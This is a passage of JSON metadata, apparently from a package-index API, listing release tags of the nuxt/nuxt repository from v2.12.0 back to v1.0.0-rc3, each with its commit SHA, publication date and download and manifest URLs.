b/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G